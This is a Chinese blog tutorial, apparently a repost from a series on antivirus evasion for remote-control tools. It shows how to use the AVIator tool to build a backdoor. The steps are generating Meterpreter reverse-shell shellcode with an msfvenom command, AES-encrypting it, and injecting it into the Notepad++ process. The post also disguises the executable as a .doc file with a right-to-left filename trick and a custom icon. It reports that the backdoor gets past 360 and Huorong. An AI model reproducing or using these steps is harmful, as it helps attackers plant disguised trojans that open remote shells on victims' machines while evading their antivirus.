远控免杀专题 14 ---AVIator

0x01 免杀能力一览表

在这里插入图片描述
几点说明:

1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。

2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。

3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01),火绒版本5.0.34.16(2020.01.01),360安全卫士12.0.0.2002(2020.01.01)。

4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀的精确判断指标。

5、完全不必要苛求一种免杀技术能bypass所有杀软,这样的技术肯定是有的,只是没被公开,一旦公开第二天就能被杀了,其实我们只要能bypass目标主机上的杀软就足够了。

0x02 AVIator介绍

AVIator使用AES加密来加密Shellcode,生成一个包含加密有效负载的可执行文件,然后使用各种注入技术将shellcode解密并注入到目标系统,从而绕过杀毒软件的检测。

0x03 安装AVIator

AVIator只有windows版,c#开发,单文件exe。

安装也非常方便,直接从github上下载下来。


git clone https://github.com/Ch0pin/AVIator

或者直接下载压缩包https://github.com/Ch0pin/AVIator/archive/master.zip
解压后在Compiled Binaries文件夹中有x86和x64的可执行exe文件,执行即可
在这里插入图片描述
使用也非常简单,只需要填入payload后简单设置一下就可以。

0x04 AVIator生成后门

首先要使用msf生成shellceode,需要基于c#,我就用msf生成一个最基础的


msfvenom -p windows/meterpreter/reverse_https  LHOST=10.211.55.2 LPORT=3333  -f csharp -o test11.c

在这里插入图片描述
在AVIator中对shellcode进行处理,AES KEY和IV默认就可以

payload地方填入上面生成的test11.c文件内容,然后点击Encrypt,生成加密后的payload。
在这里插入图片描述
目标操作系统架构根据实际情况选择就可以,x86比较通用一些。

下面还有个Injection Techniques,需要选择注入技术,我这选择第二个注入Notepad++进程
在这里插入图片描述
另外,软件还提供了RTLO选项,可以使可执行文件名看起来伪装性更好。比如,启用该选项后,文件testcod.exe将被保存文件名为testexe.doc,但文件还是可以正常被当做exe执行的。但是,选择了RTLO选项虽然更迷惑人,但也更容易被杀软报警告。

还可以自定义程序ico图标,增强伪装,我这就不配置了
在这里插入图片描述
点击generate后就可以生成后门程序了。
在这里插入图片描述
不开杀软的时候可正常上线
在这里插入图片描述
打开杀软进行测试,可过360和火绒动静态检测
在这里插入图片描述
比较诡异的是360安全卫士的行为检测发现木马行为
在这里插入图片描述
但火绒和360杀毒没点反应,可正常上线
在这里插入图片描述
后来我没启用RTLO选项又生成了一个正常的exe文件,看来RTLO选项影响还挺大。

参考

官方说明文档:https://github.com/Ch0pin/AVIator

发布了203 篇原创文章 · 获赞 19 · 访问量 2万+

猜你喜欢

转载自blog.csdn.net/qq_41683305/article/details/105153151